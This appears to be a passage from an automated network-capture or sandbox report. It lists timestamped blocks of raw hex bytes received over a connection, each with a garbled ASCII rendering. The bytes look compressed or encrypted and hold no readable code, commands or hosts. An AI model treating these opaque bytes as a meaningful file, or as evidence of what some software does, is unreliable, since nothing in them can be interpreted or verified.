                                                                                                                                                                                    2023-01-05 07:59:31 UTC18700INData Raw: 4d ca 96 98 d5 17 43 99 73 99 bf 89 68 f1 3a 0f 9c 9e 45 10 b9 a5 04 b0 e0 f3 69 98 21 da b2 54 11 67 cf 60 cc 0c cb 85 1c 34 44 7a 87 06 d9 52 59 1b bf ff cf 95 07 7e d6 aa 8a bc 92 5c a9 4c 92 d1 a0 c9 ae 5a 7e a3 41 2b a3 1f 4b d2 b2 f0 6b 27 c0 1c 9a d2 d4 97 ca 43 76 1f 75 3f ed fd a4 25 3f 0f 6d 8a 88 7a e1 da 0b 55 78 3f 7f 49 57 21 b6 f7 5e 68 f0 3a d5 44 f8 56 10 22 6e d1 26 d5 d7 5d ba 5e af aa c1 2f a3 82 8f fd bf 1f 0c 36 e7 16 35 25 e9 61 6f 04 40 d5 dc 6e 7d dc 78 1d de a3 1e f4 26 8d 0a 80 11 72 20 d6 41 56 1a 18 ee fe 52 3a 6e 19 84 fb d1 aa 1d 12 33 5e 15 35 91 35 6c d7 9b 4c 6d 8d f0 bc 1c ab 1b 4b e2 a8 63 81 1a 00 f7 3d a0 78 3d 04 14 fd 31 38 15 70 93 50 de 45 f3 fc e2 44 f8 a3 9c 30 b7 4d 65 63 c4 14 ec 3f 6c f7 8e c4 de a0 7e 45 aa
                                                                                                                                                                                    Data Ascii: MCsh:Ei!Tg`4DzRY~\LZ~A+Kk'Cvu?%?mzUx?IW!^h:DV"n&]^/65%ao@n}x&r AVR:n3^55lLmKc=x=18pPED0Mec?l~E
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18716INData Raw: 61 92 35 78 ad 63 20 3f 3c 49 01 3c 78 ba 00 7c 77 dd 94 1f 47 ce af c6 04 8f 00 0c 70 2c e2 4e 8b 1b d4 d5 99 b9 ef 82 66 ce f8 81 8e c8 ad 2b 34 3b 58 c7 bc b3 ba ce 67 57 ce c5 ec 2b 9e be 7d 19 5b 7a 5a 4f 0e f8 ac 59 06 ca 1f bb 3a 34 e4 bc ce 04 c9 b1 f6 c5 c1 a0 9d d5 24 16 87 25 44 52 01 d2 ac 75 02 21 86 28 f5 a8 df ca 99 8c bc 95 0b ec f0 dc b7 c2 d8 6e 18 9d 54 7d eb a8 8b 60 19 ff 3e 6b b5 a6 90 55 29 13 8a 69 8b 06 e3 7a 05 50 a6 97 e7 18 09 a5 f4 6e eb f6 e3 aa 87 9c 41 7a 47 71 ab 8d df 48 2e 7f 1b 7c 9b 75 e6 54 03 1f c9 93 07 4e 07 48 31 01 45 25 71 01 a3 0e c2 a9 eb 18 eb cc 70 b9 01 11 5e f3 01 e4 63 49 61 42 60 25 58 6a 12 f3 e9 04 74 86 df ea 6c 40 2d 89 7d a9 2e 7f 9c eb 7d 4f 0d 67 e1 02 c1 eb 81 92 2c 46 26 d4 63 43 70 53 7f 58 74
                                                                                                                                                                                    Data Ascii: a5xc ?<I<x|wGp,Nf+4;XgW+}[zZOY:4$%DRu!(nT}`>kU)izPnAzGqH.|uTNH1E%qp^cIaB`%Xjtl@-}.}Og,F&cCpSXt
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18732INData Raw: 7f e9 5e 46 16 06 9f 6a 24 a1 f3 d0 9f eb 5c 5f 75 cc a3 eb 2a 95 17 7c 5f 63 bb 35 76 f6 52 0f 4b 0e 98 f0 27 91 ee f2 9a 4b ca eb 0e 5b c8 25 ca db 02 35 40 97 b4 cb 69 ad 7f e0 b3 21 4a 12 ef e5 87 14 ad 25 d4 2c 7a 75 29 f0 ae b4 aa fd 11 db 8f 39 d4 5d ef a8 e1 c1 92 8d b8 a5 c6 26 6c 11 85 cf 71 6f cc fa 1c a9 80 5d 25 4e 63 c4 e6 43 63 79 91 4e 13 94 9d db 88 b0 bf 95 25 73 50 0c 92 da 2a 22 04 ce e3 7e 8c ac 97 44 ae ef dc 7d 7d 85 ec 6e 5c 79 02 98 ff 8d a3 41 ad f6 10 f9 fa d8 c9 c1 24 34 b2 ed 21 bc 04 dd 7b 26 a3 5d d4 88 c9 5a ef 80 90 5a 0b 35 bd 9c 66 db 8c f9 18 98 77 3a e4 e4 33 0d 1f 31 ee 74 ea b2 10 7d 8a 17 4a 45 2f c4 c8 d7 1b 09 c7 45 ee c5 c3 ee f7 6e c6 9b 06 ec e1 0e a9 e1 30 c3 dc 75 e7 50 7b d1 a2 90 ab c1 e3 54 58 7c 1d be ed
                                                                                                                                                                                    Data Ascii: ^Fj$\_u*|_c5vRK'K[%5@i!J%,zu)9]&lqo]%NcCcyN%sP*"~D}}n\yA$4!{&]ZZ5fw:31t}JE/En0uP{TX|
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18748INData Raw: 48 6e 1b b5 70 9a 1e 71 62 a0 4e 00 fa 7a 5a f0 e4 78 42 a9 a6 23 c4 11 a0 79 73 53 2d a8 90 69 ce 2f a1 6c 41 4f db 65 0c 00 2d ac 83 3e 5c 75 49 13 fc 0e 73 52 d0 30 91 b5 fd f9 11 0b b3 35 24 0a 7d 0b 70 26 86 56 0b ce a6 18 28 ac 0e c4 1d ac f1 27 41 08 26 e8 45 1c c6 ba a6 bb f1 27 a9 34 f3 c6 69 20 4b 48 ed 43 ef a6 19 28 a1 98 5d a2 42 0d d0 68 ed 1f 38 ef f9 77 70 40 6b 1e 7c 44 05 02 9d a8 03 58 04 58 0e 32 f3 52 57 93 8c d4 4a c6 1e 97 56 31 c2 81 89 c7 56 ed 84 e6 72 39 ca d2 40 cb e1 cd 86 9a e4 fd e6 18 c7 f0 27 7c 74 92 9e d1 9c 9b 15 54 e4 23 d8 b7 89 e4 29 d0 63 14 75 4a ab a8 18 91 cb 4a 1a e5 a9 5d c0 52 eb 89 15 92 83 f6 c2 cc b4 0e 75 32 31 cf bb 83 a9 fb 71 96 82 c3 59 90 1b 03 d2 c4 6e d0 c0 63 4f 4f 93 a5 4e 95 8f 79 c2 26 ce c5 ee
                                                                                                                                                                                    Data Ascii: HnpqbNzZxB#ysS-i/lAOe->\uIsR05$}p&V('A&E'4i KHC(]Bh8wp@k|DXX2RWJV1Vr9@'|tT#)cuJJ]Ru21qYncOONy&
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18764INData Raw: c2 2a fb ec ef 3a fa d9 09 11 44 3e a5 de 3a fe 54 1b 98 f8 68 c1 61 33 ab c0 e2 79 4f 4c d9 bc de 4c 27 35 b6 22 1d 43 2e a8 15 57 f7 a3 cd 8a 42 54 f0 da 8f 4f 68 a2 69 c6 e9 66 c5 90 2c 8c 00 91 90 ab a5 dd 91 57 a8 5c 17 97 fc 87 98 97 9e 8a 51 bd 2b a6 eb a7 b4 cf f7 d3 40 d0 37 6a 1c 6c 78 f2 ce 69 66 bc de b8 5f 22 d4 47 32 2e 54 bd 34 5c d4 00 26 46 c6 88 12 92 6b e0 e5 8f d6 44 59 ee 36 08 35 9b 42 4f 8e 5e 17 d7 fd 83 0f 7d 42 84 fa ab b1 d4 e1 11 ca ad 8a 2a cf 4d 34 1e a0 f1 da 35 88 7f 17 5a 74 c5 8d 8b 38 7b 63 03 5f f3 03 1b c3 6f 64 61 76 bf f7 d0 4b 48 d7 86 b5 2e f2 31 2e bf 93 86 7e 99 95 7e 84 40 dc 8c 64 ba 0e 8e 2b e2 02 ab f8 ad 3a 37 75 08 48 c2 75 9a 21 5b dc 6c dc fa a6 6a 0c ca 4d ec 11 5a 76 36 c3 d2 df 1c 4c 6a 9c 13 b5 1e b0
                                                                                                                                                                                    Data Ascii: *:D>:Tha3yOLL'5"C.WBTOhif,W\Q+@7jlxif_"G2.T4\&FkDY65BO^}B*M45Zt8{c_odavKH.1.~~@d+:7uHu![ljMZv6Lj
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18780INData Raw: 59 9d d7 e1 83 17 47 60 13 55 e5 a3 5b 43 86 c5 ef 8e 2d 98 19 ed 89 b4 56 50 c1 80 0e 18 4d a0 7b a2 d4 c9 9b 80 ac ed f8 3a 6b a1 3c 4b fa 08 26 a4 ea 67 63 f2 0a fe b9 af 9e dc 36 da 7f dc 95 32 77 0d 7e 05 34 8b ce d2 5a c2 05 83 ef 16 25 b7 2d 8e 80 0a ce 0c 04 47 ff 19 89 b0 c9 04 8c 49 22 a5 3e 8a 5c 9b 52 9d 17 1a 92 b2 ec 58 51 3d b0 ed f2 0a 14 dc 67 4b 55 33 b6 d9 a0 07 14 48 51 54 ef 1c d0 a0 4a 5f 2f 59 ed 99 3b eb 49 c9 5b df 18 f5 42 0e 0a 63 0d 84 35 54 4f 9c d7 78 54 ce 61 6d 87 b9 e4 72 29 bc 34 e7 17 2e 55 73 a1 f0 69 01 c9 c1 fc 64 d1 93 a1 aa 23 d9 03 24 de ea f4 83 97 ab cb ce 1a 46 e8 67 de 39 71 2e e4 1d e4 2d 13 88 79 a6 a1 f7 27 25 ab 4e d4 99 fa b4 0d 09 d4 bb 84 02 44 e8 5c e3 a4 a2 d2 50 76 1c 5a b5 a1 ce f3 a0 9e 70 ed 98 58
                                                                                                                                                                                    Data Ascii: YG`U[C-VPM{:k<K&gc62w~4Z%-GI">\RXQ=gKU3HQTJ_/Y;I[Bc5TOxTamr)4.Usid#$Fg9q.-y'%ND\PvZpX
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18796INData Raw: 57 ea 54 d0 47 b2 40 81 ef 07 bb 4f fc 6f 79 73 dd 16 56 72 15 11 ce 87 56 ba 3a 46 36 9e 7c 93 ed 26 ce 07 1e 1f b2 32 c0 75 a8 51 d9 32 46 53 ce f1 9a 3c 23 22 c8 b1 65 2a 92 5b 47 99 0e d3 d9 31 c7 1d c6 74 45 9b c2 71 17 f8 51 aa 20 18 01 82 52 64 e4 68 14 24 af e4 35 cf 23 9a 5a 59 3c c8 4d 48 6f 3a 46 26 75 3b 54 a8 59 3f ef 19 49 86 eb 2c 5e 43 3c e0 ba dc c0 e0 af b4 c8 43 40 67 20 eb 3e bd 35 99 ba 7a 39 b7 78 65 65 84 41 a3 91 c5 d4 bd c9 bf fb 27 8b 51 eb 72 0c 2f b5 4e 7b c6 23 87 8c cf 6a e8 7c 93 f6 6c 01 9b dc d7 2a 5f f0 df fe 07 0d e0 65 a9 da 8b a8 e0 00 b2 24 9c 35 d7 1d ad eb 15 65 46 c4 8d 9b c1 69 7c 50 bc 2f ff 9b c5 5c 75 87 b0 0a dd 34 f7 2a 00 78 86 d2 ff 50 10 a2 8a b2 1a 37 d3 72 e2 57 c1 5a 5b c7 8b 82 95 fd 4a 7e 54 52 cc a1
                                                                                                                                                                                    Data Ascii: WTG@OoysVrV:F6|&2uQ2FS<#"e*[G1tEqQ Rdh$5#ZY<MHo:F&u;TY?I,^C<C@g >5z9xeeA'Qr/N{#j|l*_e$5eFi|P/\u4*xP7rWZ[J~TR
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18812INData Raw: 86 66 cb 32 b8 5d 50 6d f1 0e 8c 27 79 40 01 b7 c2 8b dc a5 4c 59 c7 47 57 99 62 90 41 7c 01 e1 17 f0 43 9f fd 22 c6 d9 03 25 ee 20 1a 73 c7 6f 68 8b 20 7f dc e2 39 9b 5b 10 33 a2 df bb 90 e3 4a 09 64 ce 9a e6 3a 93 e4 b6 e8 5a 3d d9 e9 d9 57 d7 88 26 2e df 06 a5 79 49 31 63 5c 4e cd 2b f4 74 85 ae 65 f8 17 25 b4 ce 1b 4d 84 77 8a 86 c0 7a 84 4d 85 e5 6c 5c cb c4 3c 44 a7 81 cc 8c e0 26 9d 59 6f ae 41 ad a4 9f 79 24 fc d1 27 01 74 2f 9b b5 8b 71 9a 31 fd ba d3 e4 14 c2 05 b9 0b c7 1d 1b c0 54 f7 6c 37 54 38 0f 73 f2 a7 7b f0 19 ad a7 df cb 94 69 af a4 08 6f 54 2e f2 65 07 ed f0 37 bf b9 85 b0 14 89 da b0 7d aa 34 b6 81 e0 4a 30 d3 38 7f 2b 95 1c 18 bc 8e a6 78 c9 08 5a 7a 08 1a 8e a2 dd ab fc 5a e3 3a 4f 37 27 2f 2d 94 ba 39 a6 96 c1 e6 17 8b 8e 73 fe 1a
                                                                                                                                                                                    Data Ascii: f2]Pm'y@LYGWbA|C"% soh 9[3Jd:Z=W&.yI1c\N+te%MwzMl\<D&YoAy$'t/q1Tl7T8s{ioT.e7}4J08+xZzZ:O7'/-9s
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18828INData Raw: d4 a2 a4 aa a8 b3 18 d6 c6 74 2b 8e ed 82 45 29 f3 b0 b0 5b bb 65 da 4c 1d 97 50 6d 63 e4 26 66 87 20 79 23 73 74 f0 5a 7c 5a 76 c0 d2 6c fe 55 48 67 92 81 24 92 ea 05 f5 64 75 23 b1 8a 3b 85 80 dd 1f d6 1e 6d 26 c8 d0 22 b0 ee fa 6d 9f 70 8c 35 29 1e bd cb a8 59 0a a1 5d 33 ed f5 a1 67 11 ac 04 a4 7f 3b 74 a0 5e 04 d1 8a 17 ac 96 9e 5d 38 04 57 2f d7 5b 7b 46 87 e4 dc 27 3f f5 98 f0 f0 f5 50 42 36 98 fc 61 b8 94 1e e2 0e 06 82 9b f2 5b bb 71 cf bf 56 07 bb a2 53 2f 00 8f f2 48 94 f3 b8 f8 12 57 c5 b2 7a 77 ce cf d8 97 7c 42 f2 39 c7 d4 ea 7c 8d f3 72 11 13 7b ed 8b 5a b1 c7 cd ac 27 ff 3c 73 68 b7 d5 51 cd 1b d0 0c f5 c1 8d ba 2b 91 02 85 86 eb 3a 74 15 aa 04 ac c5 91 06 ef ba 99 e5 f6 c7 88 ef cd 4b 41 af ee e8 31 9e 69 1b 46 e9 34 b5 94 2f 9b c3 a4 fd
                                                                                                                                                                                    Data Ascii: t+E)[eLPmc&f y#stZ|ZvlUHg$du#;m&"mp5)Y]3g;t^]8W/[{F'?PB6a[qVS/HWzw|B9|r{Z'<shQ+:tKA1iF4/
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18844INData Raw: c9 83 98 b3 cd ad 17 40 7e 8e 3e 35 83 80 60 4e 1c 30 9f 8b 2d 95 fd 8c 23 b8 bd df 08 eb 27 1b dd a1 fb e3 ca b5 d1 9d 3e ac a2 25 ee fd 62 1d 09 24 18 35 79 41 0e db 27 b1 4a 71 70 4c e2 da 62 21 ea 6f 6e 65 61 7c a3 96 06 25 98 47 da 71 3e 4d c3 a9 0d 7f bb c3 ed 8e f8 88 ca 0a 57 77 85 46 b1 f8 1c 51 d0 34 cc 34 a1 78 71 dc 90 f9 82 9e e2 4d 42 7d 7c c2 98 a8 3a 8f d7 d1 0f 37 cb c2 e0 52 27 d6 cd 56 55 4e d3 26 8b 50 66 40 a1 59 ac 65 b1 0b 05 27 35 8c 91 fe 49 75 49 aa 04 a6 29 74 ec da 1b 71 dc 1d a9 3c 09 60 55 81 3e 90 a5 a0 25 2f aa f3 e6 0c 11 b9 ca 13 fd 23 03 99 73 1a cb dd be 63 1c e9 4e 94 09 c6 23 3c 9d 4d 0d f4 cc 15 e0 97 79 2a 9d b6 35 f6 35 ec fd 3a f3 70 44 04 d0 79 d2 c4 54 5d 59 f9 ef 6d ed 4c ad 56 75 94 97 48 d1 e4 ab 87 4f e1 97
                                                                                                                                                                                    Data Ascii: @~>5`N0-#'>%b$5yA'JqpLb!onea|%Gq>MWwFQ44xqMB}|:7R'VUN&Pf@Ye'5IuI)tq<`U>%/#scN#<My*55:pDyT]YmLVuHO
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18860INData Raw: fb f7 36 0e 3b 7d 82 02 b9 a0 e5 2a 5f ff 89 ee 63 c4 61 47 7f f3 75 97 cd ab ad 2f e5 14 00 56 5e 37 35 0e 62 e7 ae 5e c8 df 72 45 91 90 59 16 f8 38 e1 5e 23 18 f7 23 5c 00 76 34 d6 b1 68 92 a2 43 b7 c2 0d db 40 6f 33 a2 9d 2b 85 d1 17 6d 73 25 7d 30 63 46 6a c0 ba a5 31 d4 f1 a7 95 cb cb 36 b2 e6 3e 32 c5 d3 69 f6 eb ee 76 b3 24 3d a6 87 b8 54 51 61 f3 c6 9a af b4 18 80 81 85 93 04 ce a5 2f 81 2e fa ee d3 84 37 e3 20 40 cf 07 9b d6 d2 a2 12 56 ea f3 43 95 eb 6d 7d ad 98 01 81 a5 b1 0d 4e 54 4a 70 6e 5a c2 bf 5b 90 e1 2f 31 b7 51 69 7d 6d 28 4f d3 3b 94 25 e7 df 0a 42 94 a1 83 65 01 a0 db 82 de 14 8b b0 16 82 bf 8d 0e 14 b1 ff b6 20 09 a6 67 97 e3 16 f7 2c f7 7c 4e f4 4a f4 ba 94 25 36 b9 2f b0 17 3d 78 a4 18 30 7d 81 65 77 25 aa 1b 8e a3 5d e6 9e a6 85
                                                                                                                                                                                    Data Ascii: 6;}*_caGu/V^75b^rEY8^##\v4hC@o3+ms%}0cFj16>2iv$=TQa/.7 @VCm}NTJpnZ[/1Qi}m(O;%Be g,|NJ%6/=x0}ew%]
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18876INData Raw: e5 6f 3b ff 35 00 3e ea 69 c3 0d 50 bc 03 f8 42 9e 6b 54 d1 c4 84 80 35 71 44 d4 39 d4 c1 40 4d 5d 38 a8 44 47 64 f7 9e 4e a5 f6 64 1d f7 cc 80 f5 d5 56 36 4b a9 ed c0 06 f6 d3 8a 66 85 2f 16 9e 87 e2 8f e3 8e 51 63 51 28 07 95 d3 94 f7 90 97 c4 d7 65 e3 44 7e 9f d8 24 ee 49 24 28 d4 c0 76 68 b2 57 ac 25 d3 c1 51 b0 9b 8e d5 d5 b6 55 5e e3 5d a6 ff e5 b1 9b 28 ec 2f 47 2a 95 b8 8e 1c 2d 5a ea b3 7c 88 ae 5e 26 06 c2 6d 2b 30 5c e9 cd 04 86 a9 64 bc f8 34 eb e0 ab e1 2f f1 a1 45 95 17 b6 3c 14 4e 9e 14 a5 9a 65 75 0e b6 c4 0e 41 76 43 1e 93 0f 11 5d 09 ba fb 36 84 d5 7a 85 93 cd e9 4f ce e9 46 1b bd 71 c4 2b 97 e9 1d 38 4b 75 48 91 ae 6a 28 89 30 3e 2f 16 2f e2 d8 2b 73 09 f9 97 f5 07 36 66 db f0 04 11 a8 71 47 5c bb 68 a5 f5 ee 54 83 90 62 43 ab c7 69 6d
                                                                                                                                                                                    Data Ascii: o;5>iPBkT5qD9@M]8DGdNdV6Kf/QcQ(eD~$I$(vhW%QU^](/G*-Z|^&m+0\d4/E<NeuAvC]6zOFq+8KuHj(0>//+s6fqG\hTbCim
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18892INData Raw: e6 55 72 79 7c 0f 76 33 f7 ed 0e b1 d9 47 e4 14 13 39 23 cf 56 2b 2e 5a 98 a2 09 5f 3b c4 b7 c8 f4 5a 47 94 fe 2b 04 0a 96 d4 cb d5 03 b7 70 50 53 69 d0 96 49 bb 20 5e 87 8c de d7 34 38 64 ee ce 3f 53 48 58 96 d2 2b 0a 40 df 8a 64 95 7b 13 01 93 6f 57 15 85 e7 9b c7 07 b5 49 0a a4 71 37 0e 75 e0 a3 3c 4b ee 3c 50 a8 d4 97 74 5a 38 0a 38 f2 d4 99 22 4e c5 33 63 b3 d9 75 0d a6 0a fe f0 78 f4 04 a3 a9 e6 52 95 ed 99 28 7c 45 f5 74 05 30 7f 6e 63 19 66 36 3d 0a f7 fa 08 6e d4 f9 7c 36 00 dc f9 a6 6d 01 0e bb 3e de 9c cc 42 1c f0 68 be 7b d5 ee df bd 46 08 b7 47 81 62 6f a7 0c b7 89 65 0d 1b 6c b9 d4 9e 2d b6 d3 0b 89 16 6e 8b 20 97 1a a2 94 0b 40 fe fd e2 97 75 7f 07 02 8a d8 48 87 d6 4b 85 9e d1 6f 81 21 bd 6e d3 57 66 50 7d e0 78 a4 43 37 6a 36 ed f8 8b 8c
                                                                                                                                                                                    Data Ascii: Ury|v3G9#V+.Z_;ZG+pPSiI ^48d?SHX+@d{oWIq7u<K<PtZ88"N3cuxR(|Et0ncf6=n|6m>Bh{FGboel-n @uHKo!nWfP}xC7j6
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18908INData Raw: e9 94 61 c0 fd 3c ed c8 a8 b5 aa 8c ba c1 f5 0b 02 8b e8 9e dd d2 01 a5 4f 6c 59 d4 0e 44 36 39 8f 34 3d a6 e8 7b 52 ec 2c ae 6d 69 ad a6 fc 20 92 9c 71 bf 8e 84 7a 17 70 81 70 71 14 c5 84 92 55 c0 d5 8e 07 bb b8 70 a1 db 9c 96 9a 50 0f 18 43 fc 98 a5 92 57 f0 d0 6a 45 c0 51 43 ec 42 1a 90 88 da 2b c6 94 63 d0 4f 34 6a 6e 4f 50 d4 a8 04 02 80 fb cc 84 75 0d 6c 50 af ee 2c f2 13 b2 04 e5 ab 99 6f 0f 81 5c ee 5d 35 32 33 17 37 48 f0 5a c2 cf 84 5c a3 22 eb 14 d5 4f 99 74 3c d2 6e 10 27 e1 56 dd 3b ee 6a ad 3e b1 70 63 96 2f 48 22 c7 46 6f a2 aa 3a 68 f3 ed 6a 3c 66 59 83 1d 2c 8f 40 fe 08 5b 59 17 c9 03 3e de 44 14 ba 6d 49 5d ce 43 12 70 5a 1d ba 9d 88 e2 cd 21 30 28 4f ab 8f ba 41 90 5d 4b 56 4f 3c d0 71 7e a2 78 69 c9 2d 6a 11 c5 f6 70 cb 35 44 af 24 87
                                                                                                                                                                                    Data Ascii: a<OlYD694={R,mi qzppqUpPCWjEQCB+cO4jnOPulP,o\]5237HZ\"Ot<n'V;j>pc/H"Fo:hj<fY,@[Y>DmI]CpZ!0(OA]KVO<q~xi-jp5D$
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18924INData Raw: 28 75 ed 28 05 82 ba e5 85 02 77 86 23 bd b1 dc 9b 03 31 4f c3 4c d7 cb 00 8c 03 15 96 81 02 4f 4a 9b 2d 32 27 ec d0 97 b8 cf 96 97 b1 22 b4 27 ca 13 61 4e 11 e0 7b 98 72 6a 97 07 5c 36 53 4a 25 cd 54 a1 4e 75 a2 fc 2f 0f 5b 37 49 66 3e 67 f8 4a 8d de d5 b4 8c 2f 0b 21 7e 26 77 54 d4 7c f0 c5 01 ea 05 15 67 98 b7 71 87 5d c6 15 05 71 34 d8 99 91 95 31 ed d1 f7 c5 83 27 e8 6b 1e 8b 19 74 db ec c3 8f 4f 00 a8 d6 42 f8 82 07 c0 43 0d 2e 0f b1 f3 82 67 54 d6 73 f6 e3 b3 57 06 cd 49 19 c4 51 5e b7 b3 00 dd ec 1a 7e cc f9 a7 2b 5f 37 06 5d e4 39 41 5d dc c9 9c ae e3 8f 45 58 b2 b4 5c 95 ea e7 69 25 59 b3 8e 2d 03 63 2c 33 60 58 20 33 69 2f ea 91 32 7d 9b 7a 11 45 88 7d 1e d1 cb 6a ba 95 ba 46 27 7c 6b d6 6d 16 7a 9d a2 a8 5b ef 0b d5 35 62 4c 29 22 e5 cd 28 af
                                                                                                                                                                                    Data Ascii: (u(w#1OLOJ-2'"'aN{rj\6SJ%TNu/[7If>gJ/!~&wT|gq]q41'ktOBC.gTsWIQ^~+_7]9A]EX\i%Y-c,3`X 3i/2}zE}jF'|kmz[5bL)"(
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18940INData Raw: 5b e7 80 9c ad 9e dc ac 8e 7d 74 ae ae c1 e8 d8 db 19 27 ca d6 ab 4e a5 d6 f4 6a bc 9c 20 93 bf a8 3e 43 e6 a3 1e 8c 39 40 f1 0c 0c c5 aa 01 57 99 04 04 9d aa a0 20 d7 19 10 d6 8a 5b df 3d 49 92 5c 56 c6 ff 9d b1 7e 8c 60 97 f9 bb 59 d3 0f 17 46 1c 4c df 09 0f 67 d0 1a fe 75 c5 bd 8f d8 ad 7e d3 a1 5a fc 7c da 49 6f df a0 6d 8f 6e b8 08 46 f7 fd ec e5 a9 ce 2e bc 87 c7 ed 67 92 66 c0 11 3c 51 41 b6 4b 6a 6c 55 66 ff 43 1f fd 70 1f 53 ec 53 96 db a5 63 10 7f 5c af a6 97 a7 aa 06 78 58 18 de 3f 57 2a a7 df fb 36 f5 28 e4 58 69 ad de 87 f0 02 ff 9b 96 3e 48 4a 55 15 2b 45 4b 73 44 fb 74 7a 51 20 8a 78 f7 93 43 b3 60 a5 58 a7 ba 8d 04 43 f3 09 22 15 0f 91 a8 57 b1 84 b2 2d de 0d 59 03 c3 b9 aa 3a b1 f2 26 9d 08 7e a8 ac 3a e6 92 8e 8b f8 fa 0c 9f df bd f4 88
                                                                                                                                                                                    Data Ascii: [}t'Nj >C9@W [=I\V~`YFLgu~Z|IomnF.gf<QAKjlUfCpSSc\xX?W*6(Xi>HJU+EKsDtzQ xC`XC"W-Y:&~:
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18956INData Raw: f8 66 52 ec 19 3d 76 db de 4a fb c6 37 1b d8 39 be 8c 33 13 2b 8f ab 7e b9 a0 ef e2 16 d7 1f b5 de 34 47 05 b9 c2 dc 48 a5 ed bb 5c 03 a0 e9 a7 3f c7 56 d6 b9 8f f2 c8 58 ea d7 5a 5d 17 1f 1c 95 b9 d8 5e 11 98 53 76 49 3e 82 7e 7c 5f 11 e0 62 32 aa a7 a1 83 04 73 0c d0 b8 10 88 32 99 6a 0d 31 f9 00 7d 2a d7 b7 ca 0a ae 27 b6 f2 fe 19 a2 c3 90 72 5b de 05 1b 06 67 d3 97 af 2c fd 49 4d 70 77 d1 c3 4c d4 5f 65 ef 4a 69 1a af 6c 14 9e 7f 23 3a 6c c0 4a d1 67 ef 1b 91 d0 c6 bf 22 00 20 66 4d 10 0c 66 7f 15 a9 eb 3e 09 68 f7 ee 95 88 fc 87 70 a6 18 aa c6 90 de 73 ef 62 b5 e6 b9 f7 a2 c1 f8 c1 04 d7 2f 78 3b a4 50 a1 49 e2 69 ca b4 0f 8d 9c 26 53 00 ea 02 2a 80 bb ae 08 d4 35 ef d5 1b 64 e3 c0 33 81 d3 f9 6b 2a 21 b6 15 5d 4f de d4 e2 03 c7 2e f0 39 c9 7e 69 dc
                                                                                                                                                                                    Data Ascii: fR=vJ793+~4GH\?VXZ]^SvI>~|_b2s2j1}*'r[g,IMpwL_eJil#:lJg" fMf>hpsb/x;PIi&S*5d3k*!]O.9~i
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18972INData Raw: 77 39 7c 59 40 2c 32 df 57 cc a5 02 dc c7 51 0b d2 95 da 84 1f 96 85 8b 35 08 56 fa cb 56 3c e1 cf b7 1a 3e ad 4e b2 ef 51 db 13 0e 96 cf 16 94 66 5a 39 4f 86 26 75 8e ea a6 2a 56 8c 4d d5 fa 47 bd 12 97 b2 9d aa fb d8 5d 3e e9 c0 1f e3 41 00 13 4c 91 de 7c e2 77 a6 58 d9 a5 03 9d ba 0f 8e f0 16 7f 88 52 30 c9 5f 07 e3 12 80 12 b9 57 ef 00 bd 97 a5 58 45 9e 9e 9d b2 02 c3 68 40 40 9c f1 18 fb 5f ea ac 7b fd 29 56 25 81 47 78 eb cd bb 7f d1 32 40 9a 8e 1d 69 eb 5d 0c 26 39 7a 45 b8 26 58 85 8a 3b 74 5a 29 71 e3 f1 87 82 43 6c a6 58 d0 e8 0e d8 20 5e c6 6e 35 16 f8 c9 5c 15 7b 5e 65 b2 71 7c eb 1c a0 3b eb 42 23 1e 05 5e 79 be d8 41 82 65 52 75 22 99 ea fd 7c 23 8b fb 56 df 84 4a 39 38 b9 9b bf 83 e6 69 20 ee 21 c7 e0 c9 1e f6 fb da 67 e7 07 28 4c b6 48 d9
                                                                                                                                                                                    Data Ascii: w9|Y@,2WQ5VV<>NQfZ9O&u*VMG]>AL|wXR0_WXEh@@_{)V%Gx2@i]&9zE&X;tZ)qClX ^n5\{^eq|;B#^yAeRu"|#VJ98i !g(LH
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18988INData Raw: c1 af 59 e5 e4 08 0a ab 44 f1 c2 8d 8a 2b 80 c2 61 d2 d5 ed fa d5 78 ba df 96 a4 f8 7a 08 cc c8 c7 58 d8 07 3d 3e 31 e5 b7 4d aa 93 15 55 00 9b 18 0d 8b b8 96 f8 9c 34 2c 3e a2 c0 a2 4e e2 d0 9d 77 bc cc 30 82 07 21 6a 18 8c 8a f0 fb 5a 1a 0e b1 13 14 43 86 f9 7a 5b 31 69 cc 56 39 84 0e d1 e3 53 37 4f 28 f1 64 bc 94 11 0d ba 13 03 90 f4 a2 54 d2 59 67 e3 84 63 1d 72 c2 7a 8e cb b7 aa 0a 04 06 d0 d6 53 d2 54 6d 4e 14 5a 68 f0 74 da e9 9a 1e d2 28 8a ab f4 c6 40 59 d8 10 db 1e c3 51 af fa 80 aa 02 d7 5d fe 7a 64 15 0b 84 b4 6b e1 1c 85 1b 57 f7 58 1a 69 2b 4a 5e b0 4f 8c a8 4a cd bc 34 8c 17 b5 02 ee ca 08 88 a5 29 1d e4 38 7b e1 e3 29 f6 ab ad a9 a2 81 26 94 8f fa e9 5e 99 9f a7 de 62 44 32 e4 7a b7 e1 5d fd 32 e6 c1 0a 78 82 81 37 40 54 15 48 46 6d d8 b8
                                                                                                                                                                                    Data Ascii: YD+axzX=>1MU4,>Nw0!jZCz[1iV9S7O(dTYgcrzSTmNZht(@YQ]zdkWXi+J^OJ4)8{)&^bD2z]2x7@THFm
